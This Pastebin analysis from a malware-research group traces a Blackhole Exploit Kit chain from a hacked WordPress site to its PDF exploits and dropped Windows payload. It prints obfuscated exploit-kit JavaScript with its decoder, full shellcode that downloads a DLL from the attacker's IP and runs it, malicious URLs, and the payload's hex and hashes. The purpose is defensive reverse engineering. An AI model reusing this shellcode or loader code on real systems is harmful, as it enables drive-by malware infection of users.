SHARE
TWEET

#BHEK New Obf + New Path of files : ../mix/* + ../closest/*

MalwareMustDie Jan 7th, 2013 107 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // MalwareMustDie -
  2. // New Obf + New Path of files : ../mix/* + ../closest/*
  3. // Payload dropped via PDF only,
  4. // @unixfreaxjp /malware]$ date
  5. // Thu Jan  3 06:49:30 JST 2013
  6. // THIS IS A QUICK GUIDE TO DECODE BHEK ONLY,
  7. // SORRY FRIENDS, CANNOT WRITE BLOG AT THE MOMENT...
  8. // Saw the below infector using WP site:
  9. // h00p://bungatani.com/wp-content/plugins/akismet/track.php?c005
  10. // Just check it quick to find it a redirector to Ubuntu server using Blackhole...
  11.  
  12. // prisoners:
  13. 98yf8913fjipgjialhg8239jgighnjh4i6k5o.php      5ee2c9541878ccf3d04e1ac696f44bca
  14. b264b.pdf                                      a9480ade56f5631bbc7eb4f71093a3ac
  15. contacts.exe                                   aed9ac49b10a75d54f37079b18c11153
  16. infector.pdf                                   4655d90088b981bc93d4437f8cc55728
  17.  
  18. //files:
  19.  
  20. 2013/01/03  03:39            84,298 98yf8913fjipgjialhg8239jgighnjh4i6k5o.php
  21. 2013/01/03  05:22            10,053 b264b.pdf
  22. 2013/01/03  06:02            73,728 contacts.exe
  23. 2013/01/03  05:20            21,683 infector.pdf
  24.  
  25. // PoC:
  26.  
  27. --03:39:17--  h00p://bungatani.com/wp-content/plugins/akismet/track.php?c005
  28.            => `track.php@c005'
  29. Resolving bungatani.com... seconds 0.00, 174.120.9.188
  30. Caching bungatani.com => 174.120.9.188
  31. Connecting to bungatani.com|174.120.9.188|:80... seconds 0.00, connected.
  32.  
  33. ---request begin---
  34. GET /wp-content/plugins/akismet/track.php?c005 HTTP/1.0
  35. Referer: h00p://google.com/url?
  36. User-Agent: #MalwareMustDie get bored..
  37. Accept: */*
  38. Host: bungatani.com
  39. Connection: Keep-Alive
  40.  :
  41. HTTP request sent, awaiting response...
  42.  :  
  43. HTTP/1.1 302 Found
  44. Date: Wed, 02 Jan 2013 18:39:11 GMT
  45. Server: Apache
  46. Location: h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php
  47.  :
  48. Content-Length: 0
  49. Keep-Alive: timeout=5, max=75
  50. Connection: Keep-Alive
  51. Content-Type: text/html
  52.  :
  53. 302 Found
  54. Location: h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php
  55. [following]
  56. Skipping 0 bytes of body: [] done.
  57. --03:39:17--  h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php
  58.           => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php'
  59. conaddr is: 174.120.9.188
  60. Connecting to 93.190.44.177:80... seconds 0.00, connected.
  61. Created socket 1880.
  62.   :
  63. GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php HTTP/1.0
  64. Referer: h00p://google.com/url?
  65. User-Agent: #MalwareMustDie get bored..
  66. Accept: */*
  67. Host: 93.190.44.177
  68. Connection: Keep-Alive
  69.   :
  70. HTTP request sent, awaiting response...
  71.   :
  72. HTTP/1.1 200 OK
  73. Server: nginx/1.2.6
  74. Date: Wed, 02 Jan 2013 18:39:13 GMT
  75. Content-Type: text/html
  76. Connection: close
  77. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  78. Vary: Accept-Encoding
  79.   :
  80. 200 OK
  81. Length: unspecified [text/html]
  82. Closed fd 1880
  83. 03:39:21 (53.25 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php' saved [84298]
  84.  
  85. // It's a plugindetect obfuscated, a bit new in some ways,
  86.  
  87. Code: GOTO http://pastebin.com/5nyMBuTj
  88.  
  89.  
  90. // See the code the first one is an applet code:
  91.  
  92. <applet archive="/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?lgw=nwez&ujrttao=pknugvqw" code="hw">
  93. <param value="Dyy3Ojjc1w6cfwLLw6BBj%-tieiyjcrS.rc61.C8" name="&#00118;&#0097;&#00108;"/>
  94. <param value="3AC8V-DArh1cCA8ADoCDL8Pq4tw3D3xk.b1fO6oO68O68O11RDeb6qO6.Oh_O60O16O6tO6-O6-O1fO16Ryb6.RKFbSRKlbe" name="&#00112;&#00114;&#00105;&#00109;&#00101;" />
  95. </applet>
  96.  
  97. // and we have the plugin detect obfsuscated script
  98. // below is the structure:
  99.  
  100.  
  101. // obfuscated data merger logic:
  102.  
  103. dd="i";
  104. pp="e"+"In";
  105. asd=function()
  106.      {
  107.      for(i=0;;i++)
  108.        {
  109.         r=a.getAttribute("z"+i);
  110.         if(r){s=s+r;}else break;
  111.        }
  112.      };
  113. v="setAttribute";
  114.  
  115. // obfuscated data
  116.  
  117.  
  118. a[v]("z0","-[0-9,a-z]...-[0-9,a-z]");</script><script>
  119.       :
  120.      "z27"
  121.  
  122. // deobfuscation part...
  123.  
  124. document.body.appendChild(a);  // blah...
  125. if(document.getElementsByTagName("d"+"iv")[0].style.left===""){ss=String;a=document["getElementsB"+"yTagName"](dd); // blah..
  126. a=a[0];
  127. s=new String();
  128. asd();
  129. a=s;
  130. s=new String();
  131. e=eval;
  132. cxz=function(){if(a["su"+"bstr"](i,1)=="-")i+=2;};
  133. p=parseInt;
  134.  
  135. // this is the badass' deobfuscation logic! he thinks its a cool code.. actually sucks...
  136. for(i=0;a.length>i;i+=2){    
  137.         cxz();
  138.         s=s+(ss["fromChar"+"Code"]((p(a["substr"](i,2),27)+57)/5));
  139. }
  140. // end of deobfuscation logic
  141.  
  142. if(window.document)try{document.body*=document;}catch(asfas){e("if(1)"+s);}} // its a blah blah..
  143.  
  144.  
  145. ///// let's make it simple!
  146.  
  147. GOTO: http://pastebin.com/x5NCqQaL
  148.  
  149.  
  150. // Debfs it & Make it easy to read...
  151.  
  152. GOTO: http://pastebin.com/GtknERxr
  153.  
  154.  
  155. // the dropped PDF
  156.  
  157.  function p1()
  158.  {
  159.    var d=document.createElement("object");
  160.    d.setAttribute("data","/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?klpiphtw="+x("c833f")+"&zfbqrto="+x("pvr")+"&amk=1k:1f:2w:1m:31:1o:1l:1l:30:31&nakupk="+x(pdfver.join(".")));
  161.    d.setAttribute("type","application/pdf");
  162.    document.body.appendChild(d);
  163.  }
  164.  function p2()
  165.  {
  166.    var d=document.createElement("object");
  167.    d.setAttribute("data","/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?gbxec="+x("c833f")+"&kmchk="+x("z")+"&sgolnjs=1k:1f:2w:1m:31:1o:1l:1l:30:31&atdweawi="+x(pdfver.join(".")));
  168.    d.setAttribute("type","application/pdf");
  169.    document.body.appendChild(d);
  170.  }
  171.  
  172.  
  173. // use their formula to crack...
  174.  
  175.  function x(s)
  176.  {
  177.    d=[];
  178.    for(i=0;i<s.length;i++)
  179.    {
  180.      k=(s.charCodeAt(i)).toString(33);
  181.      d.push(k);
  182.    };
  183.    return d.join(":");
  184.  }
  185. a=x("c833f");
  186. document.write(a);  
  187.  
  188. // results:
  189.  
  190. x("c833f") ---> 30:1n:1i:1i:33
  191. x("pvr")   ---> 3d:3j:3f
  192. x("z")     ---> 3n
  193. x(pdfver.join("."))) ---> 1k:1d:1f:1d:1g:1d:1f
  194.  
  195. // assemble the url:
  196.  
  197. // PDF1:
  198. h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?klpiphtw=30:1n:1i:1i:33&zfbqrto=3d:3j:3f&amk=1k:1f:2w:1m:31:1o:1l:1l:30:31&nakupk=1k:1d:1f:1d:1g:1d:1f
  199.  
  200. // PDF2:
  201. h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?gbxec=30:1n:1i:1i:33&kmchk=3n&sgolnjs=1k:1f:2w:1m:31:1o:1l:1l:30:31&atdweawi=1k:1d:1f:1d:1g:1d:1f
  202.  
  203.  
  204. // download the PDF:
  205.  
  206. --05:20:46--  h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?klpiphtw=30:1n:1i:1i:33&zfbqrto=3d:3j:3f&amk=1k:1f:2w:1m:31:1o:1l:1l:30:31&nakupk=1k:1d:1f:1d:1g:1d:1f
  207.            => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@klpiphtw=30%3A1n%3A1i%3A1i%3A33&zfbqrto=3d%3A3j%3A3f&amk=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&nakupk=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
  208. Connecting to 93.190.44.177:80... seconds 0.00, connected.
  209.   :
  210. GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?klpiphtw=30:1n:1i:1i:33&zfbqrto=3d:3j:3f&amk=1k:1f:2w:1m:31:1o:1l:1l:30:31&nakupk=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
  211. Referer: h00p://google.com/url?
  212. User-Agent: #MalwareMustDie get bored..
  213. Accept: */*
  214. Host: 93.190.44.177
  215. Connection: Keep-Alive
  216.   :
  217. HTTP request sent, awaiting response...
  218.   :
  219. HTTP/1.1 200 OK
  220. Server: nginx/1.2.6
  221. Date: Wed, 02 Jan 2013 20:20:41 GMT
  222. Content-Type: application/pdf
  223. Content-Length: 21683
  224. Connection: keep-alive
  225. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  226. ETag: "b0f35ed29d77e484b0aae4ed97587cca"
  227. Last-Modified: Wed, 02 Jan 2013 20:20:43 GMT
  228. Accept-Ranges: bytes
  229.   :
  230. 200 OK
  231. Length: 21,683 (21K) [application/pdf]
  232. 05:20:48 (33.78 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@klpiphtw...' saved [21683/21683]
  233.  
  234.  
  235. --05:22:02--  h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?gbxec=30:1n:1i:1i:33&kmchk=3n&sgolnjs=1k:1f:2w:1m:31:1o:1l:1l:30:31&atdweawi=1k:1d:1f:1d:1g:1d:1f
  236.           => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@gbxec=30%3A1n%3A1i%3A1i%3A33&kmchk=3n&sgolnjs=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&atdweawi=1k%3A1d%3A1f%3A1d%3A1g%3A1d%3A1f'
  237. Connecting to 93.190.44.177:80... seconds 0.00, connected.
  238.   :
  239. GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?gbxec=30:1n:1i:1i:33&kmchk=3n&sgolnjs=1k:1f:2w:1m:31:1o:1l:1l:30:31&atdweawi=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
  240. Referer: h00p://google.com/url?
  241. User-Agent: #MalwareMustDie get bored..
  242. Accept: */*
  243. Host: 93.190.44.177
  244. Connection: Keep-Alive
  245.   :
  246. HTTP request sent, awaiting response...
  247.   :
  248. HTTP/1.1 200 OK
  249. Server: nginx/1.2.6
  250. Date: Wed, 02 Jan 2013 20:21:57 GMT
  251. Content-Type: application/pdf
  252. Content-Length: 10053
  253. Connection: keep-alive
  254. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  255. Accept-Ranges: bytes
  256. Content-Disposition: inline; filename=b264b.pdf
  257.   :
  258. 200 OK
  259. Length: 10,053 (9.8K) [application/pdf]
  260. 05:22:04 (27.58 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@gbxec...' saved [10053/10053]
  261.  
  262.  
  263.  
  264. // The first PDF has no defined name by the server so let's call it infector.pdf
  265. // while the second PDF has the defined name "b264b.pdf" so let7s use that name.
  266. 2013/01/03  05:22            10,053 b264b.pdf
  267. 2013/01/03  05:20            21,683 infector.pdf
  268.  
  269.  
  270. //I started to crack the bigger size PDF file.. by experience.. the biggest one has payload stuff..
  271.  
  272. // found the other javascrpt obfuscation...
  273.  
  274. Code: GOTO: http://pastebin.com/u6Kbatz8
  275.  
  276. // I decode it here....
  277.  
  278. Code: GOTO: http://pastebin.com/y0XjEfAX
  279.  
  280.  
  281. // to find shellcode below:
  282.  
  283.  bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u392f%u2e33%u3931%u2e30%u3434%u312e%u3737%u632f%u6f6c%u6573%u7473%u392f%u7938%u3866%u3139%u6633%u696a%u6770%u696a%u6c61%u6768%u3238%u3933%u676a%u6769%u6e68%u686a%u6934%u6b36%u6f35%u702e%u7068%u703f%u6676%u6472%u333d%u3a30%u6e31%u313a%u3a69%u6931%u333a%u2633%u7a75%u7868%u3d70%u6b31%u313a%u3a66%u7732%u313a%u3a6d%u3133%u313a%u3a6f%u6c31%u313a%u3a6c%u3033%u333a%u2631%u7179%u3d71%u6831%u6a26%u636b%u616c%u6d75%u3d6f%u6c65%u786e%u2665%u696a%u7a65%u636f%u676c%u793d%u6864%u006f%u0000';
  284.  
  285. // translated:
  286.  
  287. 66 83 e4 fc fc 85 e4 75  34 e9 5f 33 c0 64 8b 40    f......u4._3.d.@
  288. 30 8b 40 0c 8b 70 1c 56  8b 76 08 33 db 66 8b 5e    0.@..p.V.v.3.f.^
  289. 3c 03 74 33 2c 81 ee 15  10 ff ff b8 8b 40 30 c3    <.t3,........@0.
  290. 46 39 06 75 fb 87 34 24  85 e4 75 51 e9 eb 4c 51    F9.u..4$..uQ..LQ
  291. 56 8b 75 3c 8b 74 35 78  03 f5 56 8b 76 20 03 f5    V.u<.t5x..V.v...
  292. 33 c9 49 41 fc ad 03 c5  33 db 0f be 10 38 f2 74    3.IA....3....8.t
  293. 08 c1 cb 0d 03 da 40 eb  f1 3b 1f 75 e6 5e 8b 5e    ......@..;.u.^.^
  294. 24 03 dd 66 8b 0c 4b 8d  46 ec ff 54 24 0c 8b d8    $..f..K.F..T$...
  295. 03 dd 8b 04 8b 03 c5 ab  5e 59 c3 eb 53 ad 8b 68    ........^Y..S..h
  296. 20 80 7d 0c 33 74 03 96  eb f3 8b 68 08 8b f7 6a    ..}.3t.....h...j
  297. 05 59 e8 98 ff ff ff e2  f9 e8 00 00 00 00 58 50    .Y............XP
  298. 6a 40 68 ff 00 00 00 50  83 c0 19 50 55 8b ec 8b    j@h....P...PU...
  299. 5e 10 83 c3 05 ff e3 68  6f 6e 00 00 68 75 72 6c    ^......hon..hurl
  300. 6d 54 ff 16 83 c4 08 8b  e8 e8 61 ff ff ff eb 02    mT........a.....
  301. eb 72 81 ec 04 01 00 00  8d 5c 24 0c c7 04 24 72    .r.......\$...$r
  302. 65 67 73 c7 44 24 04 76  72 33 32 c7 44 24 08 20    egs.D$.vr32.D$..
  303. 2d 73 20 53 68 f8 00 00  00 ff 56 0c 8b e8 33 c9    -s.Sh.....V...3.
  304. 51 c7 44 1d 00 77 70 62  74 c7 44 1d 05 2e 64 6c    Q.D..wpbt.D...dl
  305. 6c c6 44 1d 09 00 59 8a  c1 04 30 88 44 1d 04 41    l.D...Y...0.D..A
  306. 51 6a 00 6a 00 53 57 6a  00 ff 56 14 85 c0 75 16    Qj.j.SWj..V...u.
  307. 6a 00 53 ff 56 04 6a 00  83 eb 0c 53 ff 56 04 83    j.S.V.j....S.V..
  308. c3 0c eb 02 eb 13 47 80  3f 00 75 fa 47 80 3f 00    ......G.?.u.G.?.
  309. 75 c4 6a 00 6a fe ff 56  08 e8 9c fe ff ff 8e 4e    u.j.j..V.......N
  310. 0e ec 98 fe 8a 0e 89 6f  01 bd 33 ca 8a 5b 1b c6    .......o..3..[..
  311. 46 79 36 1a 2f 70 68 74  74 70 3a 2f 2f 39 33 2e    Fy6./ph00p://93.
  312. 31 39 30 2e 34 34 2e 31  37 37 2f 63 6c 6f 73 65    190.44.177/close
  313. 73 74 2f 39 38 79 66 38  39 31 33 66 6a 69 70 67    st/98yf8913fjipg
  314. 6a 69 61 6c 68 67 38 32  33 39 6a 67 69 67 68 6e    jialhg8239jgighn
  315. 6a 68 34 69 36 6b 35 6f  2e 70 68 70 3f 70 76 66    jh4i6k5o.php?pvf
  316. 72 64 3d 33 30 3a 31 6e  3a 31 69 3a 31 69 3a 33    rd=30:1n:1i:1i:3
  317. 33 26 75 7a 68 78 70 3d  31 6b 3a 31 66 3a 32 77    3&uzhxp=1k:1f:2w
  318. 3a 31 6d 3a 33 31 3a 31  6f 3a 31 6c 3a 31 6c 3a    :1m:31:1o:1l:1l:
  319. 33 30 3a 33 31 26 79 71  71 3d 31 68 26 6a 6b 63    30:31&yqq=1h&jkc
  320. 6c 61 75 6d 6f 3d 65 6c  6e 78 65 26 6a 69 65 7a    laumo=elnxe&jiez
  321. 6f 63 6c 67 3d 79 64 68  6f 00 00 00                oclg=ydho...    
  322.  
  323. // In reversed showing API calls:
  324.  
  325. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020b4, dwSize=255)
  326. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  327. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  328. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?pvfrd=30:1n:1i:1i:33&uzhxp=1k:1f:2w:1m:31:1o:1l:1l:30:31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)   0
  329. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  330. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  331. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  332.  
  333. // Got the payload url:
  334.  
  335. h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?pvfrd=30:1n:1i:1i:33&uzhxp=1k:1f:2w:1m:31:1o:1l:1l:30:31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho
  336.  
  337.  
  338. // Get the payload....
  339.  
  340. --06:02:30--  h00p://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?pvfrd=30:1n:1i:1i:33&uzhxp=1k:1f:2w:1m:31:1o:1l:1l:30:31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho
  341.            => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@pvfrd=30%3A1n%3A1i%3A1i%3A33&uzhxp=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho'
  342. Connecting to 93.190.44.177:80... seconds 0.00, connected.
  343.   :
  344. GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?pvfrd=30:1n:1i:1i:33&uzhxp=1k:1f:2w:1m:31:1o:1l:1l:30:31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho HTTP/1.0
  345. Referer: h00p://google.com/url?
  346. User-Agent: #MalwareMustDie get bored..
  347. Accept: */*
  348. Host: 93.190.44.177
  349. Connection: Keep-Alive
  350.   :
  351. HTTP request sent, awaiting response...
  352.   :
  353. HTTP/1.1 200 OK
  354. Server: nginx/1.2.6
  355. Date: Wed, 02 Jan 2013 21:02:25 GMT
  356. Content-Type: application/x-msdownload
  357. Content-Length: 73728
  358. Connection: keep-alive
  359. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  360. Pragma: public
  361. Expires: Wed, 02 Jan 2013 21:02:27 GMT
  362. Cache-Control: must-revalidate, post-check=0, pre-check=0
  363. Cache-Control: private
  364. Content-Disposition: attachment; filename="contacts.exe"
  365. Content-Transfer-Encoding: binary
  366.   :
  367. 200 OK
  368. Length: 73,728 (72K) [application/x-msdownload]
  369. 06:02:33 (46.32 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@pvfrd=30%3A1n%3A1i%3A1i%3A33&uzhxp=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&yqq=1h&jkclaumo=elnxe&jiezoclg=ydho' saved [73728/73728]
  370.  
  371.  
  372. // we got the binary called contacts.exe :-)
  373.  
  374. 0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
  375. 0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
  376. 0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  377. 0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
  378. 0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
  379. 0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
  380. 0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
  381. 0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
  382. 0080   50 45 00 00 4C 01 07 00 28 1A E4 50 00 00 00 00    PE..L...(..P....
  383. 0090   00 00 00 00 E0 00 0F 03 0B 01 02 04 00 32 00 00    .............2..
  384. 00A0   00 74 00 00 00 04 00 00 40 12 00 00 00 10 00 00    .t......@.......
  385.  
  386. // sigs of packer...
  387.  
  388. 06E0   90 90 90 90 90 90 90 EB 11 EF C4 A1 5D 58 C6 9D    ............]X..
  389. 06F0   87 B4 5C F6 B8 47 AC 6F 86 F4 EB 11 EF C4 A1 5D    .....G.o.......]
  390. 0700   58 C6 9D 87 B4 5C F6 B8 47 AC 6F 86 F4 90 90 90    X.......G.o.....
  391. 0710   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  392. 0720   90 90 90 90 90 90 90 90 90 90 90 90 90 EB 11 EF    ................
  393. 0730   C4 A1 5D 58 C6 9D 87 B4 5C F6 B8 47 AC 6F 86 F4    ..]X.......G.o..
  394. 0740   EB 11 EF C4 A1 5D 58 C6 9D 87 B4 5C F6 B8 47 AC    .....]X.......G.
  395. 0750   6F 86 F4 E8 90 1C 00 00 85 C0 75 0F C7 85 94 EF    o.........u.....
  396. 0760   FF FF 00 00 00 00 E9 CF 06 00 00 90 90 90 90 90    ................
  397. 0770   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  398. 0780   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  399. 0790   90 90 90 EB 11 EF C4 A1 5D 58 C6 9D 87 B4 5C F6    ........]X......
  400. 07A0   B8 47 AC 6F 86 F4 EB 11 EF C4 A1 5D 58 C6 9D 87    .G.o.......]X...
  401. 07B0   B4 5C F6 B8 47 AC 6F 86 F4 90 90 90 90 90 90 90    ....G.o.........
  402. 07C0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  403. 07D0   90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90    ................
  404. 07E0   90 EB 11 EF C4 A1 5D 58 C6 9D 87 B4 5C F6 B8 47    ......]X.......G
  405. 07F0   AC 6F 86 F4 EB 11 EF C4 A1 5D 58 C6 9D 87 B4 5C    .o.......]X.....
  406. :                      :                                       :
  407. 0E40   C9 C3 90 90 55 89 E5 AA 52 54 82 9A 4B A0 38 96    ....U...RT..K.8.
  408. 0E50   AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0    .RT..K.8..RT..K.
  409. 0E60   38 96 AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A    8..RT..K.8..RT..
  410. 0E70   4B A0 38 96 D8 F8 AA 52 54 82 9A 4B A0 38 96 AA    K.8....RT..K.8..
  411. 0E80   52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38    RT..K.8..RT..K.8
  412. 0E90   96 AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B    ..RT..K.8..RT..K
  413. 0EA0   A0 38 96 D8 F8 AA 52 54 82 9A 4B A0 38 96 AA 52    .8....RT..K.8..R
  414. 0EB0   54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38 96    T..K.8..RT..K.8.
  415. 0EC0   AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0    .RT..K.8..RT..K.
  416. 0ED0   38 96 D8 F8 AA 52 54 82 9A 4B A0 38 96 AA 52 54    8....RT..K.8..RT
  417. 0EE0   82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38 96 AA    ..K.8..RT..K.8..
  418. 0EF0   52 54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38    RT..K.8..RT..K.8
  419. 0F00   96 D8 F8 AA 52 54 82 9A 4B A0 38 96 AA 52 54 82    ....RT..K.8..RT.
  420. 0F10   9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38 96 AA 52    .K.8..RT..K.8..R
  421. 0F20   54 82 9A 4B A0 38 96 AA 52 54 82 9A 4B A0 38 96    T..K.8..RT..K.8.
  422. 0F30   D8 F8 AA 52 54 82 9A 4B A0 38 96 AA 52 54 82 9A    ...RT..K.8..RT..
  423.  
  424. // see Virus total report in "Additional Information" for binary's detail:
  425. https://www.virustotal.com/file/b9c4b1ecaa15631735cd56ac3c70a2492b2ebc052aa1b3187178765e508e2678/analysis/
  426.  
  427.  
  428. Entry Point: 0x1240
  429. Compile Time: 0x50E41A28 [Wed Jan 02 11:29:44 2013 UTC]
  430.  
  431. section:
  432. .bss
  433. code was packed with ID: MingWin32 GCC 3.x (Database Result)
  434.  
  435.  
  436. // readable calls..
  437.  
  438. Name:                          0xA43C    
  439. FirstThunk:                    0xA148    
  440.  
  441. KERNEL32.dll.AddAtomA Hint[1]
  442. KERNEL32.dll.ExitProcess Hint[155]
  443. KERNEL32.dll.FindAtomA Hint[175]
  444. KERNEL32.dll.GetAtomNameA Hint[220]
  445. KERNEL32.dll.GetModuleHandleA Hint[335]
  446. KERNEL32.dll.SetUnhandledExceptionFilter Hint[735]
  447.  
  448. Name:                          0xA414    
  449. FirstThunk:                    0xA130    
  450.  
  451. COMCTL32.DLL.CreateToolbarEx Hint[16]
  452. COMCTL32.DLL.CreateUpDownControl Hint[17]
  453. COMCTL32.DLL.PropertySheetA Hint[97]
  454. COMCTL32.DLL.Str_SetPtrW Hint[129]
  455.  
  456. Here's the VT report:
  457.  
  458. SHA1:   e6561522623e3aff12f806bed88eb326b78af7e1
  459. MD5:    aed9ac49b10a75d54f37079b18c11153
  460. File size:      72.0 KB ( 73728 bytes )
  461. File name:      contacts.exe
  462. File type:      Win32 EXE
  463. Detection ratio:        7 / 46
  464. Analysis date:  2013-01-02 21:23:18 UTC ( 1 分 ago )
  465. https://www.virustotal.com/file/b9c4b1ecaa15631735cd56ac3c70a2492b2ebc052aa1b3187178765e508e2678/analysis/1357161798/
  466.  
  467. You can also enjoy Anubis report:
  468. http://anubis.iseclab.org/?action=result&task_id=199c5090d063c6d843590a39d1d2c016a&format=html
  469.  
  470. While I have to drive back to Tokyo from now..
  471.  
  472. ---
  473. #MalwareMustDie!! @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top